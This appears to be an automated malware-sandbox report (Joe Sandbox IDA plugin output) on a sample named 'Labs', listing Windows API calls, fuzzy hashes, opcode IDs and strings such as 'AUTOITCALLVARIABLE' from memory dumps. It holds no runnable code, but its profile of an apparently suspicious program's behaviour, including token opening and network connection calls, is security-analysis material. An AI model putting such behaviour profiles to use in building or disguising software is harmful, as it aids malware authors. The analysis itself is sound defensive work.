                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateHandleProcess
                                                    • String ID:
                                                    • API String ID: 3277943733-0
                                                    • Opcode ID: a1ca3469570973b61ee0dcfbe78292c60f6990b941968064bf0d79d0068cec76
                                                    • Instruction ID: 16beb5cb7e992f2637e177be3421f17ddd3cbff2dbce616686b645a4bf75c91b
                                                    • Opcode Fuzzy Hash: a1ca3469570973b61ee0dcfbe78292c60f6990b941968064bf0d79d0068cec76
                                                    • Instruction Fuzzy Hash: C0F012B2640304FFE75067A5AC09FBB3A5EFB49755F000821BB08E61A2DF795D1097A9
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 007D71A1
                                                      • Part of subcall function 007D7C7F: _memset.LIBCMT ref: 007D7CB4
                                                    • _memmove.LIBCMT ref: 007D71C4
                                                    • _memset.LIBCMT ref: 007D71D1
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 007D71E1
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                    • String ID:
                                                    • API String ID: 48991266-0
                                                    • Opcode ID: 1724da39d9fd6b7dedcb0391d8392b648caefb9d52dcc9ee69b883613f1dc845
                                                    • Instruction ID: b15ad8593cb059e84ba9dac8a8e2a5470c14327f2a5b82dde45b6236880f7bc8
                                                    • Opcode Fuzzy Hash: 1724da39d9fd6b7dedcb0391d8392b648caefb9d52dcc9ee69b883613f1dc845
                                                    • Instruction Fuzzy Hash: 0BF05E3A200100EBCF416F55EC89B4ABB29FF45321F08C051FE085E22ACB35A921DBB4
                                                    APIs
                                                      • Part of subcall function 007716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00771729
                                                      • Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771738
                                                      • Part of subcall function 007716CF: BeginPath.GDI32(?), ref: 0077174F
                                                      • Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771778
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007FC3E8
                                                    • LineTo.GDI32(00000000,?,?), ref: 007FC3F5
                                                    • EndPath.GDI32(00000000), ref: 007FC405
                                                    • StrokePath.GDI32(00000000), ref: 007FC413
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 1539411459-0
                                                    • Opcode ID: c92138161bbab4ed09fee7347331756cbd96606113c3441281afbd1ad69d4889
                                                    • Instruction ID: 258f551266e7957d744417171c07ff268c27dfee1c5d679664ee38c2adff3d4f
                                                    • Opcode Fuzzy Hash: c92138161bbab4ed09fee7347331756cbd96606113c3441281afbd1ad69d4889
                                                    • Instruction Fuzzy Hash: EDF05E3100565DBADB636F54AC0DFEE3F99BF05321F148010FB51611E187B85551DFA9
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007CAA6F
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 007CAA82
                                                    • GetCurrentThreadId.KERNEL32 ref: 007CAA89
                                                    • AttachThreadInput.USER32(00000000), ref: 007CAA90
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    • Opcode ID: 16cd12cafcd8f466a2ab0a6d8dee344e1a4f0832da5672b10afa352d81e3782d
                                                    • Instruction ID: 0ab974f70f72250ac53cae3fdcfa3a9b6a0e3413991eeb2cf4b7fe4e8fbe77ae
                                                    • Opcode Fuzzy Hash: 16cd12cafcd8f466a2ab0a6d8dee344e1a4f0832da5672b10afa352d81e3782d
                                                    • Instruction Fuzzy Hash: 4DE0393154132CBADB615FA29D0CFEB3F5DFF257A2F008019F51984060CB768550CBA0
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 0077260D
                                                    • SetTextColor.GDI32(?,000000FF), ref: 00772617
                                                    • SetBkMode.GDI32(?,00000001), ref: 0077262C
                                                    • GetStockObject.GDI32(00000005), ref: 00772634
                                                    • GetWindowDC.USER32(?,00000000), ref: 007AC1C4
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 007AC1D1
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 007AC1EA
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 007AC203
                                                    • GetPixel.GDI32(00000000,?,?), ref: 007AC223
                                                    • ReleaseDC.USER32(?,00000000), ref: 007AC22E
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    • Opcode ID: acef03ea5ead20595eb3774a8ec36df25595b9dbb1d186b1f7aecdc6e508397c
                                                    • Instruction ID: e0cf4193844c083e47275fd5a6aad5c433ecf5d422b9547bbd4b278ad49c4a8a
                                                    • Opcode Fuzzy Hash: acef03ea5ead20595eb3774a8ec36df25595b9dbb1d186b1f7aecdc6e508397c
                                                    • Instruction Fuzzy Hash: 09E0ED31604248BBDF625FA8AC49BD83B21FB56336F148366FA79980E287754990DF12
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 007C9339
                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,007C8F04), ref: 007C9340
                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007C8F04), ref: 007C934D
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,007C8F04), ref: 007C9354
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CurrentOpenProcessThreadToken
                                                    • String ID:
                                                    • API String ID: 3974789173-0
                                                    • Opcode ID: ea71a4687b649a84fc78eeb2d962f71c54d9b0f7b266cfd0fe3c5facc6aea8b8
                                                    • Instruction ID: 2bdba1924f0eb3bc1fdae743d6270d57d2359baceedc8d88396dae0dd6d7d346
                                                    • Opcode Fuzzy Hash: ea71a4687b649a84fc78eeb2d962f71c54d9b0f7b266cfd0fe3c5facc6aea8b8
                                                    • Instruction Fuzzy Hash: AFE04F726012119BD7A01FB25D0EB563B6CBF50792F11881CB285C9090E6389444CB50
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 007B0679
                                                    • GetDC.USER32(00000000), ref: 007B0683
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B06A3
                                                    • ReleaseDC.USER32(?), ref: 007B06C4
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 484e07f98a03ea68a972704869ae765d36a98d60a48b2b3b468e82d0cb52c0a7
                                                    • Instruction ID: 18a6c93d5c047eb684290096bf83cb1c52b62ddfa0928620f7430af69cfd1137
                                                    • Opcode Fuzzy Hash: 484e07f98a03ea68a972704869ae765d36a98d60a48b2b3b468e82d0cb52c0a7
                                                    • Instruction Fuzzy Hash: 7CE0E5B1800704EFCF919FA0D808B9D7BB2BB9C350F118005F96AA7220CB3985519F50
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 007B068D
                                                    • GetDC.USER32(00000000), ref: 007B0697
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B06A3
                                                    • ReleaseDC.USER32(?), ref: 007B06C4
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 37643d7d4dca7d9e1f15099f65de91240edc7ecdd7745e3d281c306eb0c5458d
                                                    • Instruction ID: cdd0483f23650e386e8de9fd454c4fe663e54e658ff019e4d40334f83d936ec7
                                                    • Opcode Fuzzy Hash: 37643d7d4dca7d9e1f15099f65de91240edc7ecdd7745e3d281c306eb0c5458d
                                                    • Instruction Fuzzy Hash: F1E012B1800704EFCF919FA0D808B9D7BF2BBAC350F108009F96AA7220CB3995518F50
                                                    APIs
                                                      • Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D
                                                      • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                      • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                    • __wcsnicmp.LIBCMT ref: 007DB670
                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007DB739
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                    • String ID: LPT
                                                    • API String ID: 3222508074-1350329615
                                                    • Opcode ID: e1ea3196d5f76cdd27c616dedb1cbf6772af1f64561f0311e293a59123ca231f
                                                    • Instruction ID: 16d8a3434e8ab15bb468c6b044307da56571dbefdc19b51ee0389c11d3a27432
                                                    • Opcode Fuzzy Hash: e1ea3196d5f76cdd27c616dedb1cbf6772af1f64561f0311e293a59123ca231f
                                                    • Instruction Fuzzy Hash: 4E619375A00219EFCB14EF94C895EAEB7B4EF48310F05805BF546AB391DB78AE40CB94
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: #Vx
                                                    • API String ID: 4104443479-2004165239
                                                    • Opcode ID: 3945e4ae5e908bb5252e31cde469fca44b0dfc0a120e82842c90c0bc4ab87c0f
                                                    • Instruction ID: 2ef45ba564db8081cefc57e84499d31085f12407bf8e82249f5d009305facdd5
                                                    • Opcode Fuzzy Hash: 3945e4ae5e908bb5252e31cde469fca44b0dfc0a120e82842c90c0bc4ab87c0f
                                                    • Instruction Fuzzy Hash: 49516070900609DFCF24CF68C884AEEBBF5FF85304F248529E85AD7250E735A955CB91
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 0077E01E
                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0077E037
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: 9f63c0af91e380f1227f07b3838a5119079888384f4704c01b5c6a398f4f80d7
                                                    • Instruction ID: 80924d0e010cf2badacc72f8adc5357ebfe2a95cf63a3c62d79f9b2706be38e4
                                                    • Opcode Fuzzy Hash: 9f63c0af91e380f1227f07b3838a5119079888384f4704c01b5c6a398f4f80d7
                                                    • Instruction Fuzzy Hash: 5C516772508744DBE720AF10E88ABAFBBF8FF84354F41884CF2D8411A1DB749528CB66
                                                    APIs
                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007F8186
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F819B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: 99d997dfa2c97bbccd3e635e02a92f158b7fe5de82473880a7ab62d1a1ea2dae
                                                    • Instruction ID: b691ca95371686e8cb32ae2d52989bde893928a95ee0006011cb81ae5da8ae33
                                                    • Opcode Fuzzy Hash: 99d997dfa2c97bbccd3e635e02a92f158b7fe5de82473880a7ab62d1a1ea2dae
                                                    • Instruction Fuzzy Hash: 55410874A0120D9FDB54CF68C881BEA7BB5FF08300F50056AEA18EB351DB35A956DF91
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?), ref: 007F713C
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007F7178
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    • Opcode ID: 1067adbace64a12055c501057264ff99131c6124c7b72cdb90876b821cbd540d
                                                    • Instruction ID: 1237f94ea8b8a0bbe1b42f20760cbd7008d1bd6f74cd3390f3aaf7e6303634bc
                                                    • Opcode Fuzzy Hash: 1067adbace64a12055c501057264ff99131c6124c7b72cdb90876b821cbd540d
                                                    • Instruction Fuzzy Hash: 6531B271100208EEDB149F78CC41BFB73A9FF88720F109619FAA987290DB35AC81CB60
                                                    APIs
                                                    • _memset.LIBCMT ref: 007D30B8
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D30F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: a19510f9500fa2ac0821cd4834d7e26cd2d7462f88e8fa50219ee1fd36982288
                                                    • Instruction ID: e95d8b7f8ab77d8a0efd73917d0560e266874217a41f62f688fe18c2c1dd29cd
                                                    • Opcode Fuzzy Hash: a19510f9500fa2ac0821cd4834d7e26cd2d7462f88e8fa50219ee1fd36982288
                                                    • Instruction Fuzzy Hash: 1C31063160020EDBEB248F58D885FAEBBB9FF05340F14401AE885A63A0E7799B44CB52
                                                    APIs
                                                    • __snwprintf.LIBCMT ref: 007E4132
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf_memmove
                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                    • API String ID: 3506404897-2584243854
                                                    • Opcode ID: 5371745bf1420451ae35f7c61a7455bf3bc7032bc16ae4bc4f4daf9926412afe
                                                    • Instruction ID: ecd9591da8395a0f556311b64aac41132ffc8946e6630b829f767f8eb9b0e93d
                                                    • Opcode Fuzzy Hash: 5371745bf1420451ae35f7c61a7455bf3bc7032bc16ae4bc4f4daf9926412afe
                                                    • Instruction Fuzzy Hash: 3621B131A4021CEBCF14EFA5D895EAE77B9FF58340F404458F914A7281DB38E985DBA2
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007F6D86
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F6D91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: 666d2332f1004f89c84e5aefa3234af75da7bdca72d03c1f8bcad91d22d7f66d
                                                    • Instruction ID: e6ff3b1315246e0b92db116980a9262c78f2f6f4406ec55d68e1bdb20202f2f1
                                                    • Opcode Fuzzy Hash: 666d2332f1004f89c84e5aefa3234af75da7bdca72d03c1f8bcad91d22d7f66d
                                                    • Instruction Fuzzy Hash: 1911827131020CBFEF219E54DC81EBB3B6BEB883A4F114525FA189B391D679DC519760
                                                    APIs
                                                      • Part of subcall function 00772111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
                                                      • Part of subcall function 00772111: GetStockObject.GDI32(00000011), ref: 00772163
                                                      • Part of subcall function 00772111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D
                                                    • GetWindowRect.USER32(00000000,?), ref: 007F7296
                                                    • GetSysColor.USER32(00000012), ref: 007F72B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    • Opcode ID: 52361ec64f8096e6ef7e0a1f3f945cd40dc9cc0db2ba07c586457e0765b82fa4
                                                    • Instruction ID: 3ddddf66b6f3d9a65133422dc22c0263ea005f61a967cc3059e391f4d55e1e87
                                                    • Opcode Fuzzy Hash: 52361ec64f8096e6ef7e0a1f3f945cd40dc9cc0db2ba07c586457e0765b82fa4
                                                    • Instruction Fuzzy Hash: E621177261420AAFDB04DFA8CC45AFA7BB8FB08314F004519FE55D3251D639E851DB60
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 007F6FC7
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007F6FD6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
